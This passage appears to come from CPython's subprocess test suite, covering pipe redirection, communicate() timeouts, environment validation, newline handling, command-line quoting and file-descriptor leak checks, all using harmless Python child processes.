@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=support.SHORT_TIMEOUT)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_repr(self):
# Run a command that waits for user input, to check the repr() of
# a Proc object while and after the sub-process runs.
code = 'import sys; input(); sys.exit(57)'
cmd = [sys.executable, '-c', code]
result = "<Popen: returncode: {}"
with subprocess.Popen(
cmd, stdin=subprocess.PIPE, universal_newlines=True) as proc:
self.assertIsNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
proc.communicate(input='exit...\n')
proc.wait()
self.assertIsNotNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
self.assertIsInstance(subprocess.Popen[bytes], types.GenericAlias)
